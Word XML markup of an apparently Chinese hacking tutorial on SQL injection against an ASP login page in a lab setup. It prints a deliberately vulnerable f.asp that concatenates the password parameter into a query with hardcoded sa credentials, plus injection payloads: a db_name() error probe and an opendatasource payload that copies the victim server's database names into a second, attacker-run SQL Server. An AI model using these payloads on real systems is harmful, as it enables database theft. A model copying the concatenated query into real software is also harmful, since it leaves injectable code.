                <w:p w14:paraId="71069053" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00A103ED">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                  <w:r>
                    <w:t xml:space="preserve">         'Data Source=ServerName;User ID=MyUID;Password=MyPass'</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="23DBC18E" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00A103ED">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                  <w:r>
                    <w:t xml:space="preserve">         ).Northwind.dbo.Categories</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="409D32BD" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00A103ED">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA2600" w14:textId="77777777" w:rsidR="00444716" w:rsidRDefault="00444716" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43909EA0" w14:textId="77777777" w:rsidR="00444716" w:rsidRDefault="00444716" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E223030" w14:textId="77777777" w:rsidR="00444716" w:rsidRDefault="00444716" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209F6B52" w14:textId="77777777" w:rsidR="00444716" w:rsidRDefault="00444716" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE4E003" w14:textId="77777777" w:rsidR="00444716" w:rsidRDefault="00444716" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D72A7E8" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0"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想到了没有，我们完全可以用此语句获得注入数据库的库名、表名、列名、字段值的所有信息。如果你还是不明白，那就来看我表演。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A060CC" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0"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在192.168.8.10这台服务器上构建了一个测试环境，写了一个有漏洞的ASP代码。两段代码中的e.asp代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="079B8D16" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAE5312" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;form action=f.asp method=get&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43B58EAA" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>帐号</w:t>
            </w:r>
            <w:r>
              <w:t>lcx&lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272EE148" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>密码</w:t>
            </w:r>
            <w:r>
              <w:t>&lt;input  type=text size=100 name=password&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C85529C" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;input type=submit value=submit&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31BF0124" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/form&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="758031A6"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 xml:space="preserve"> 效果如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD9109" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="467FBBCE" wp14:editId="2D54B7DC">
            <wp:extent cx="4345305" cy="1250950"/>
            <wp:effectExtent l="1905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4345305" cy="1250950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1D71F"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f.asp代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="6BC72A2D" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C96735D" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;%</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D48BFB" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">strSQLServerName = "127.0.0.1"      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F0AE3D0" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">strSQLDBUserName = "sa"           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FD29548" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">strSQLDBPassword = "lcx"           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CB5A23B" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">strSQLDBName = "bbsuser"               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1D7850" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>Set conn = Server.CreateObject("ADODB.Connection")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="289D8ED3" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" &amp; strSQLServerName &amp; ";User ID=" &amp; strSQLDBUserName &amp; ";Password=" &amp; strSQLDBPassword &amp; ";Database=" &amp; strSQLDBName &amp; ";"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7CEE93" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>conn.open strCon</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D9408A" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>sql2="select * from bbsuser where username='admin' and password='"&amp;request("password")&amp;"'"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478DBE62" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>set rs2=conn.execute(sql2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CD7DAF" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5B7260" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583F9182" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;%="</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>语句是</w:t>
            </w:r>
            <w:r>
              <w:t>"&amp;sql2%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19BE10C1" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B957E80" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>rs2.close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2122CBCB" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>set rs2=nothing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF0F5AC" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>conn.close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0DB9E7" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>set conn=nothing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A19467" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>%&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52A9FCBA"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当在图中的文本框提交</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="TCSC" w:val="0"/>
          <w:attr w:name="NumberType" w:val="1"/>
          <w:attr w:name="Negative" w:val="False"/>
          <w:attr w:name="HasSpace" w:val="False"/>
          <w:attr w:name="SourceValue" w:val="1"/>
          <w:attr w:name="UnitName" w:val="’"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00CD76A0">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="00CD76A0">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>’</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and db_name()&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的时候，效果如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E51597D"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noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="261E4D96" wp14:editId="73934516">
            <wp:extent cx="4513580" cy="1514475"/>
            <wp:effectExtent l="19050" t="0" r="127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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4513580" cy="1514475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2FC28" w14:textId="77777777" w:rsidR="00F25318" w:rsidRDefault="00444716" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00A103ED" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OK,测试环境构建完毕。我又在另一台服务器192.168.8.20装了一个sqlserver，sa的密码是lcx。因为</w:t>
      </w:r>
      <w:r w:rsidR="00A103ED" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>opendatasource</w:t>
      </w:r>
      <w:r w:rsidR="00A103ED" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宏走得是TCP协议，所以你要保证192.168.8.20的1433端口 一定要被192.168.8.10访问到。</w:t>
      </w:r>
      <w:r w:rsidR="00A103ED" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00A103ED" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qlserver sp2版本如果默认装在xp sp2下的话1433端口不会被外界访问到的，这一点你要注意，建议打上SQL的SP3补丁。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF06C04" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="006472F7" w:rsidRDefault="00A103ED" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="95"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一步：得到当前所有库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416C9511" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0" w:rsidRDefault="00A103ED" w:rsidP="00200887">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="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先在192.168.8.20上建库名和表名，你如果在企业管理器图形界面下安装我也不反对，我是直接的查循分析器写的语句：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="817" w:type="dxa"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="4B9304BA" w14:textId="77777777" w:rsidTr="003426A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D9F8F2E" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>create database lcx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D44C807" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>CREATE TABLE ku(name nvarchar(256) null);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BA992D" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>CREATE TABLE biao(id int NULL,name nvarchar(256) null);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="622921F2" w14:textId="77777777" w:rsidR="006472F7"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样我们就建好了一个库名是lcx，有两个表分别是ku和biao。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>u这个表存放了一个列名是name，类型是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nvarchar(256)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;biao这个表存放了两个列名，分别是int型的id和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nvarchar(256)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>型的name列名。这里的库名、表名、列名的名字都是随便定的，你只要保证类型对就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08319B" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0"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先来温习一下得到所有库名的SQL语句，代码是</w:t>
      </w:r>
      <w:r w:rsidRPr="00444716">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select name from master.dbo.sysdatabases</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。如果你现在还不懂这句代码的话，可要恶补一下了。我们用一条语句得到192.168.8.10服务器上的所有数据库名。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="817" w:type="dxa"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7711"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="0BD53411" w14:textId="77777777" w:rsidTr="00382DAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5863E857" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00255A87" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r w:rsidRPr="00255A87">
              <w:t>insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.biao select name from master.dbo.sysdatabases--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D3B1738"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在我们的测试环境上就是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF664CF"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http://192.168.8.10/web/f.asp?password=1'insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ku</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> select name from master.dbo.sysdatabases—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D862C25"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效果如图3所示：</w:t>
      </w:r>
    </w:p>
